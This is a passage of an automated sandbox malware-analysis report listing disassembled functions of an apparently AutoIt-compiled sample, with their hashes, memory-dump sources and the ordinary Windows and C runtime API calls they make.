                                              • Opcode ID: 40e7704e8706b862a21c5d7ceaf299dc28a4ed30096919d2764fc7a90d7f7546
                                              • Instruction ID: b6cbb99f06b01e976c9de49d4aabbd57c775156c8ee9abe49e7d337872e2e7d7
                                              • Opcode Fuzzy Hash: 40e7704e8706b862a21c5d7ceaf299dc28a4ed30096919d2764fc7a90d7f7546
                                              • Instruction Fuzzy Hash: 5C018471C00A09ABCF32AF649C0649E7BE1EF51361F54C1A5B83C5A191DB71CA51DF91
                                              APIs
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • __lock_file.LIBCMT ref: 00B753EB
                                                • Part of subcall function 00B76C11: __lock.LIBCMT ref: 00B76C34
                                              • __fclose_nolock.LIBCMT ref: 00B753F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                              • Instruction ID: e7e5c5be7c7bfb4f000a7fa486ef9fa16347b7d7eb00af9f7a86785691a55842
                                              • Opcode Fuzzy Hash: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                              • Instruction Fuzzy Hash: 8CF0BB71800B049AD7316F7598067AD77E06F41374F21C2D8A43DAB1D1CFFC4941AB55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8dde90ae16b4451cebadd3eb49954729d56aea94a9e03c57e9b9cb26ec5545a8
                                              • Instruction ID: 4450ed6c656f4228072d0ed5760d1d051a985c56766a8ff913352b8bcbdac908
                                              • Opcode Fuzzy Hash: 8dde90ae16b4451cebadd3eb49954729d56aea94a9e03c57e9b9cb26ec5545a8
                                              • Instruction Fuzzy Hash: DD518A30A00604EBDF24EB68C991FAE77E6AF45311F1480E8F906AB392DA34ED04CB51
                                              APIs
                                                • Part of subcall function 01007F60: GetFileAttributesW.KERNELBASE(?), ref: 01007F6B
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0100884C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 3401506121-0
                                              • Opcode ID: 0b123c2c37f26543cc8b44d8b0353a9df7f5705004a2e2ba94bd6ba47c0da593
                                              • Instruction ID: 2a064f6de4b5c1d8e0607f71dc40e32887721032de3d19a19d79789a331c04b4
                                              • Opcode Fuzzy Hash: 0b123c2c37f26543cc8b44d8b0353a9df7f5705004a2e2ba94bd6ba47c0da593
                                              • Instruction Fuzzy Hash: 98519131A1120996EF14EFA0D804BEF7379FF58300F1085A9A649F72C0EB799B44CB66
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B55B96
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 2f946b201ec5f5a8a7c8478a4c9d338836236deb88371187c8617ca7e9b66553
                                              • Instruction ID: cc5451e5cbf133f381216d22c07726b55f55e3630081b78f9d6bbbaadb7e7bc1
                                              • Opcode Fuzzy Hash: 2f946b201ec5f5a8a7c8478a4c9d338836236deb88371187c8617ca7e9b66553
                                              • Instruction Fuzzy Hash: EF313B31A00A05ABCB28DF6CC494AADB7F5FF48322F1486A9DC1993750D770B994CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 3d547ab254de8bef72e4f021a845cddc3bf60f57939ad4ce22e3e86d10b56eff
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: E731A170A10105DBC71AEF68C4C4A69FBE6FB59300B64C6E6E81ACB355D631EDD1DB80
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: d80a0cbfe89e4c4274946fd2ab4b854f3780793176342f0fc9523496ad2c5209
                                              • Instruction ID: 4eec1f263c4924e4ac5ac5036ef6462709257bc1df3f0b063da847b61d314a78
                                              • Opcode Fuzzy Hash: d80a0cbfe89e4c4274946fd2ab4b854f3780793176342f0fc9523496ad2c5209
                                              • Instruction Fuzzy Hash: 19410574504341DFDB14DF14C494B1ABBE0BF49315F0989ECE99A9B362D732E849CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: e75b07057267258661b26c07b81abfdd2a22560227d0709ca859ae3ec03292c2
                                              • Instruction ID: a2e081dc28d433c4b31e5667feff4ae10d0248fefaf719e6223504e8edfb2d4a
                                              • Opcode Fuzzy Hash: e75b07057267258661b26c07b81abfdd2a22560227d0709ca859ae3ec03292c2
                                              • Instruction Fuzzy Hash: B521D871914A08EBDB10AF51E8807AE7BF8FF04311F2184EBE885D5061D77095D0DB45
                                              APIs
                                                • Part of subcall function 00B54BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B54BEF
                                                • Part of subcall function 00B7525B: __wfsopen.LIBCMT ref: 00B75266
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                • Part of subcall function 00B54B6A: FreeLibrary.KERNEL32(00000000), ref: 00B54BA4
                                                • Part of subcall function 00B54C70: _memmove.LIBCMT ref: 00B54CBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                              • Instruction ID: be2fc6f961dfac910d1e2ab155440e5609404aa3a7643050823dc805b5d3e818
                                              • Opcode Fuzzy Hash: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                              • Instruction Fuzzy Hash: 9E11E731600205ABCF15BF74C817FAD77E4EF44715F1088EEF942A7181EBB19A499B50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: b6f003962da78e57425e0186271d25b494337d4a469ea8972517c2cb92e66d48
                                              • Instruction ID: adac41a0122567ade572ba5242b1470e4ca32e52f736700f1d268a54fb8b6e2c
                                              • Opcode Fuzzy Hash: b6f003962da78e57425e0186271d25b494337d4a469ea8972517c2cb92e66d48
                                              • Instruction Fuzzy Hash: 5B211374908301DFCB14EF24C484B2ABBE1BF88315F0589A8F89A57762D731E849CB92
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00B556A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B55C16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: c923d3f202ac726c142b7bace49209a2d4b2e9b9a2b77787e022511ce32abb97
                                              • Instruction ID: 3e4e794c90f1e164029d24770a8bba552466dc6695dfdfe3d8097217f8df3ff0
                                              • Opcode Fuzzy Hash: c923d3f202ac726c142b7bace49209a2d4b2e9b9a2b77787e022511ce32abb97
                                              • Instruction Fuzzy Hash: 3F113A71204B059FE3308F19C894B66B7E5EF44762F10C9AEE99A86A51D771F848CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 68205d27ac4155f798ec0ec681d5576bc6f6357978d24f8a088acc3bb8418320
                                              • Instruction ID: 51d0f4bd627bea8e332200a0e309f033b568e1a82a0898d7c259f083780662a2
                                              • Opcode Fuzzy Hash: 68205d27ac4155f798ec0ec681d5576bc6f6357978d24f8a088acc3bb8418320
                                              • Instruction Fuzzy Hash: 33018FB5600A02AFC315EB68C451D26F7E9FF8A31171485AAF969C7702DB35EC21CBE0
                                              APIs
                                              • __lock_file.LIBCMT ref: 00B748A6
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                              • Instruction ID: aa9e47a3c10ee9129a97ac8c4e9e3a85df6bf1a19752aac167786ef099165dc7
                                              • Opcode Fuzzy Hash: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                              • Instruction Fuzzy Hash: 64F0AF31940609ABDF11AFB48C0A7AE36E0EF00326F15C594F43C9A191CB788A51DB52
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                              • Instruction ID: 3fbf90e2b877e2e508be1796540aabefa7d4b1a77836fc574fd3bb64e55a4e85
                                              • Opcode Fuzzy Hash: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                              • Instruction Fuzzy Hash: E5F03071505751CFCB389F64E495916B7E1FF1432A32089FEE5D782620C7719888DF40
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                              • Instruction ID: e27c6dcc4b0fdd45ecdbe31fd6af82f3ead79c63c9f8adbb313681cdf61c5d2d
                                              • Opcode Fuzzy Hash: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                              • Instruction Fuzzy Hash: 74E08636A4512957C720A6589C05FEAB7DDDB887A1F0441F6FC08D7254DD609C818690
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction ID: 3553fd6d6f0368e9f1a401640012ef7c2d40a991706f8a2d1f1ce14bd9fdfc5a
                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction Fuzzy Hash: 96E092B0104B045FD7388A24D840BE373E5EB05304F00085DF2AA83241EBA3B841C759
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 01007F6B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction ID: 845cb4beded8a56630cb80c0f484f072a3f900b244b3d4f942e72fb58fef68d3
                                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction Fuzzy Hash: B8E08630505208DBE795CBA88C046BD73A4D705310F004699E595C31C0DA34A940D665
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B8DD42,?,?,00000000), ref: 00B55C5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: a7ecd69a2f3863eb4eaa2c97d88c3dc5bf55b448b4ed78f7f1d5f24610dbbe37
                                              • Instruction ID: a3cb6935f9d9da303a763681a0e3895988e80823990b7d1cc198030fdeb13c65
                                              • Opcode Fuzzy Hash: a7ecd69a2f3863eb4eaa2c97d88c3dc5bf55b448b4ed78f7f1d5f24610dbbe37
                                              • Instruction Fuzzy Hash: EFD0C77464420CBFE710DB80DC46FA9B77CD705710F100195FD0467290E6B27D508795
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 01007F3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
